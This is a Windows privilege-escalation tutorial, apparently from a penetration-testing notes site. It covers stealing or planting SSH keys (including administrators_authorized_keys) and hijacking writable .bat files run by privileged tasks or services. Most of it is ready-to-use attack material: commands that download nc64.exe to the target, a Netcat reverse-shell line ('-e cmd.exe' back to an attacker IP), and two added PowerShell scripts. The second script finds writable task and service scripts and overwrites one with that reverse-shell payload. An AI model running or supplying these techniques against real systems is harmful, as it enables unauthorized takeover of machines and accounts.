Windows Privilege Escalation

Here are some techniques for achieving privilege escalation on Windows systems:

Abusing SSH keys

  • Check if we have reading permissions on the SSH private keys of a user

#On the target machine
type C:\Users\$user\.ssh\$keyfile    #For a user

The default private key file names are id_rsa, id_ecdsa and id_ed25519; the matching public key has a .pub suffix. A readable private key is only useful if that user is allowed to log in over SSH (sshd running and the account not restricted in sshd_config).


  • Copy the keys to a file, assign permissions to the file, and use it to log in using the key

#On our machine
nano $filename #Copy here the keys
chmod 600 $filename
ssh $username@$IP -i $filename

chmod 600 is required: the OpenSSH client refuses a private key that is readable by other users ("UNPROTECTED PRIVATE KEY FILE" ... "bad permissions") and silently ignores it for authentication.


  • When we have write permissions on the .ssh/ directory (or on the authorized_keys file) of another user, we can generate an SSH key pair on our machine and plant the public key on the target

ssh-keygen -f $keyfile

This writes the private key to $keyfile and the public key to $keyfile.pub


  • Append the public key to the authorized_keys file of the target user. Note that on Windows OpenSSH, members of the Administrators group do not use their own authorized_keys by default: the default sshd_config points them at C:\ProgramData\ssh\administrators_authorized_keys, so for an admin account that file is the one that must be writable

#On the target machine, after copying the .pub file over
type $keyfilename.pub >> C:\Users\$user\.ssh\authorized_keys    #>> appends, so existing keys keep working

  • Log in as that user with the private key

ssh $username@$IP -i $keyfile 
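The following PowerShell script is an added example and is not part of the original page: it performs the checks of this section from a low-privileged shell on the target, listing readable private keys, writable .ssh directories and authorized_keys files, and the administrators_authorized_keys file. It only reads; nothing is modified. The user-profile root C:\Users and the ACL-based write check (generic-rights ACEs are not decoded, so confirm odd results with icacls) are assumptions of this example.

```powershell
# Added example (not from the original page): enumerate SSH key material on a Windows host.
# Read-only. Assumes user profiles live under C:\Users.

$Me     = [Security.Principal.WindowsIdentity]::GetCurrent()
$MySids = @($Me.User.Value) + @($Me.Groups | ForEach-Object { $_.Value })

function Test-WritableByMe {
    # ACL-based check: does an Allow ACE for our SID or one of our group SIDs grant write-ish
    # rights on $Path, with no matching Deny ACE? Comparing SIDs avoids name-resolution issues.
    # Generic-rights ACEs (GENERIC_WRITE etc.) are treated as non-matching (assumption: verify with icacls).
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $want  = [int][Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    $allow = $false
    foreach ($r in $acl.GetAccessRules($true, $true, [Security.Principal.SecurityIdentifier])) {
        if ($MySids -notcontains $r.IdentityReference.Value) { continue }
        if (([int]$r.FileSystemRights -band $want) -eq 0) { continue }
        if ($r.AccessControlType -eq 'Deny') { return $false }
        $allow = $true
    }
    return $allow
}

function Test-ReadableByMe {
    # The authoritative test for "can I read this key" is simply to open it.
    param([string]$Path)
    try { [IO.File]::OpenRead($Path).Dispose(); return $true } catch { return $false }
}

function Find-SshKeyTargets {
    $hits = @()
    $sshDirs = Get-ChildItem -LiteralPath 'C:\Users' -Directory -Force -ErrorAction SilentlyContinue |
               ForEach-Object { Join-Path $_.FullName '.ssh' } |
               Where-Object { Test-Path -LiteralPath $_ }
    foreach ($dir in $sshDirs) {
        if (Test-WritableByMe $dir) {
            $hits += [pscustomobject]@{ Path = $dir; Finding = 'WRITABLE .ssh directory (drop an authorized_keys)' }
        }
        $ak = Join-Path $dir 'authorized_keys'
        if ((Test-Path -LiteralPath $ak) -and (Test-WritableByMe $ak)) {
            $hits += [pscustomobject]@{ Path = $ak; Finding = 'WRITABLE authorized_keys (append our public key)' }
        }
        # Private keys: any readable file whose first line is a PEM/OpenSSH private-key header
        $files = Get-ChildItem -LiteralPath $dir -File -Force -ErrorAction SilentlyContinue |
                 Where-Object { $_.Name -notmatch '\.pub$' -and $_.Name -notin 'authorized_keys','known_hosts','config' }
        foreach ($f in $files) {
            if (-not (Test-ReadableByMe $f.FullName)) { continue }
            $head = Get-Content -LiteralPath $f.FullName -TotalCount 1 -ErrorAction SilentlyContinue
            if ($head -match 'PRIVATE KEY') {
                $hits += [pscustomobject]@{ Path = $f.FullName; Finding = "READABLE private key ($head)" }
            }
        }
    }
    # Administrators authenticate against this file by default, not their own authorized_keys
    $adminKeys = 'C:\ProgramData\ssh\administrators_authorized_keys'
    if ((Test-Path -LiteralPath $adminKeys) -and (Test-WritableByMe $adminKeys)) {
        $hits += [pscustomobject]@{ Path = $adminKeys; Finding = 'WRITABLE administrators_authorized_keys (SSH as admin)' }
    }
    return $hits
}

Find-SshKeyTargets | Format-Table -AutoSize
```

Run it from the PowerShell session obtained on the target; every row is a candidate for the key-reuse or key-planting steps above. A hit on a user's .ssh directory is only worth something if that user can actually log in over SSH, so check that sshd is running (Get-Service sshd) before spending time on it.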

Abusing .bat files with full control permissions

When a .bat file (a Windows batch script) is executed on the system by a more privileged account (for example from a scheduled task, a service wrapper or a logon script) and our user has Full control (F), Modify (M) or Write (W) permissions over it, we can replace its contents and have our commands run with the privileges of whoever executes it.

  • From the cmd.exe shell we have as the current user, try to spawn PowerShell (the checks below use PowerShell aliases)

...> powershell
PS ...>            #If it worked the command line will look like this

  • Find a .bat file and check its permissions: we need (F), (M) or (W) granted to our user or to one of our groups (Everyone, Users, Authenticated Users). If so, read its content to see which processes it launches and check whether any of them is still running, which confirms the script really is being executed

icacls $batFile  #Check permissions: look for (F), (M) or (W) next to our user or one of our groups
cat $batFile     #PowerShell alias of Get-Content: see which processes the script launches
ps               #PowerShell alias of Get-Process: check whether those processes are still running

  • Download and import a Netcat executable for Windows

# On our machine
wget https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe  #Fetch the raw file; the /blob/ page URL returns HTML, not the binary
python3 -m http.server $myPort  #Run in the folder that holds the executable

# On the target machine (PowerShell: wget is an alias of Invoke-WebRequest)
wget http://$myIP:$myPort/nc64.exe -OutFile nc64.exe

  • Start a Netcat listener on our machine to catch the connection, then replace the content of the .bat file with a single line that launches the Netcat executable back to us

# On our machine
nc -nvlp $ncPort

# On the target machine, from cmd.exe: one ASCII line, $ncFilePath being the full path to nc64.exe.
# Do not write it with '>' from Windows PowerShell 5.1: that redirection produces UTF-16LE,
# which cmd.exe will not run as a batch file (use Set-Content -Encoding ASCII there instead).
echo $ncFilePath -e cmd.exe $myIP $ncPort > $batFilePath

Then we wait for the script to be executed again by its task or service; the listener receives a shell running with that account's privileges. Keep a copy of the original .bat so it can be restored afterwards.
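The following PowerShell script is an added example and is not part of the original page: it automates the search described in this section by pulling .bat/.cmd paths out of scheduled-task actions and service image paths, keeping only those the current user can open for writing, and it writes the Netcat line the way the cmd.exe one-liner above does (a single ASCII line). The Netcat path, listener IP and port, and the use of scheduled tasks and services as the only sources of executed scripts are assumptions of this example; nothing is written unless Write-BatPayload is called with -Force.

```powershell
# Added example (not from the original page): find writable .bat/.cmd scripts that scheduled
# tasks or services execute, and optionally overwrite one with the reverse-shell line.

function Test-OpenForWrite {
    # Probe by opening the existing file for write; the kernel evaluates the ACL for us.
    param([string]$Path)
    try {
        [IO.File]::Open($Path, [IO.FileMode]::Open, [IO.FileAccess]::Write, [IO.FileShare]::ReadWrite).Dispose()
        return $true
    } catch { return $false }
}

function Get-BatPathsFromCommand {
    # Extract every *.bat / *.cmd path (quoted or bare) from a command line.
    param([string]$CommandLine)
    if (-not $CommandLine) { return @() }
    [regex]::Matches($CommandLine, '"([^"]+\.(?:bat|cmd))"|(\S+\.(?:bat|cmd))', 'IgnoreCase') |
        ForEach-Object { if ($_.Groups[1].Value) { $_.Groups[1].Value } else { $_.Groups[2].Value } }
}

function Find-WritableBatTargets {
    $hits = @()
    # Scheduled tasks: the script may be the executable itself or sit in the arguments (cmd /c x.bat)
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($a in $task.Actions) {
            foreach ($p in Get-BatPathsFromCommand "$($a.Execute) $($a.Arguments)") {
                $p = [Environment]::ExpandEnvironmentVariables($p)
                if ((Test-Path -LiteralPath $p) -and (Test-OpenForWrite $p)) {
                    $hits += [pscustomobject]@{
                        Source = "task $($task.TaskPath)$($task.TaskName)"
                        RunsAs = $task.Principal.UserId
                        Path   = $p
                    }
                }
            }
        }
    }
    # Services: the image path may be a wrapper that calls a .bat
    foreach ($svc in Get-CimInstance Win32_Service -ErrorAction SilentlyContinue) {
        foreach ($p in Get-BatPathsFromCommand $svc.PathName) {
            $p = [Environment]::ExpandEnvironmentVariables($p)
            if ((Test-Path -LiteralPath $p) -and (Test-OpenForWrite $p)) {
                $hits += [pscustomobject]@{ Source = "service $($svc.Name)"; RunsAs = $svc.StartName; Path = $p }
            }
        }
    }
    return $hits
}

function Write-BatPayload {
    # Replace $BatPath with one line that launches nc64.exe back to our listener.
    # -Encoding ASCII is deliberate: Windows PowerShell 5.1's '>' writes UTF-16LE, which cmd.exe
    # does not run as a batch file. A .bak copy is kept so the original can be restored.
    param(
        [Parameter(Mandatory)][string]$BatPath,
        [Parameter(Mandatory)][string]$NcPath,        # full path to nc64.exe on the target (assumption)
        [Parameter(Mandatory)][string]$AttackerIp,
        [Parameter(Mandatory)][int]$AttackerPort,
        [switch]$Force
    )
    $line = "`"$NcPath`" -e cmd.exe $AttackerIp $AttackerPort"
    if (-not $Force) { Write-Host "[dry run] would write to ${BatPath}: $line"; return }
    Copy-Item -LiteralPath $BatPath -Destination "$BatPath.bak" -Force
    Set-Content -LiteralPath $BatPath -Value $line -Encoding ASCII
}

Find-WritableBatTargets | Format-Table -AutoSize
# Example invocation (values are placeholders):
# Write-BatPayload -BatPath 'C:\Scripts\backup.bat' -NcPath 'C:\Users\Public\nc64.exe' -AttackerIp 10.10.14.5 -AttackerPort 4444 -Force
```

The RunsAs column is what makes a hit interesting: a script run as SYSTEM or a local administrator gives the shell that account's privileges, while one run as our own user gives nothing. Start the nc -nvlp listener on our machine before calling Write-BatPayload with -Force, then wait for the task or service to fire.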
